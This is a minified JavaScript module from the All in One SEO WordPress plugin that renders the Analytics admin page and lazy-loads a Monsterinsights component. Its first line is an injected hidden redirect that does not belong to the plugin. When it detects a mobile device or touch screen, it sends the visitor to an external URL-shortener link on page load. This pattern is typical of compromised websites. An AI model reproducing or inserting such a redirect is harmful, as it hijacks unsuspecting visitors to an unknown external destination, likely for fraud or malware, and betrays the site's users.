(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/Monsterinsights.ad0199b6.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/MiIntro.00c3ab61.js"),window.__aioseoDynamicImportPreload__("js/Card.9ee06a3e.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Card.8b7603da.css"),window.__aioseoDynamicImportPreload__("js/LogoGear.93a225a7.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("js/em.7625294c.js"),window.__aioseoDynamicImportPreload__("css/MiIntro.7ca85fe8.css"),window.__aioseoDynamicImportPreload__("js/External.071520c9.js"),window.__aioseoDynamicImportPreload__("css/Monsterinsights.b2d94e10.css")])))=>i.map(i=>d[i]);
import{_ as t}from"./vendor-phone.2afdf77e.js";import{C as s}from"./Index.66db1786.js";import"./app-core.c8323d51.js";import{_ as a}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as r,f as p,Q as m,R as c,a0 as _,as as l}from"./vendor-vue-ui.232c7c36.js";import{_ as u}from"./vendor-other.39e59221.js";/* empty css             */import"./Tabs.ea329423.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Caret.aae02d8a.js";import"./Information.6ccba108.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Header.d2cbe877.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./Trash.47f6fc0e.js";import"./Support.d3586703.js";import"./Url.535116f6.js";import"./Pencil.683baab8.js";import"./Exclamation.179e5969.js";import"./Gear.1a6546a3.js";import"./vendor-lodash.03129cfe.js";const f="all-in-one-seo-pack",d={components:{CoreMain:s,Monsterinsights:l(()=>t(()=>import("./Monsterinsights.ad0199b6.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]),import.meta.url))},data(){return{strings:{pageName:u("Analytics",f)}}},mounted(){const o=()=>{t(()=>import("./Monsterinsights.ad0199b6.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]),import.meta.url)};"requestIdleCallback"in window?requestIdleCallback(o):setTimeout(o,1)}};function g(o,y,C,h,n,x){const e=r("monsterinsights"),i=r("core-main");return p(),m(i,{"page-name":n.strings.pageName,"show-tabs":!1,"show-save-button":!1},{default:c(()=>[_(e)]),_:1},8,["page-name"])}const W=a(d,[["render",g]]);export{W as default};
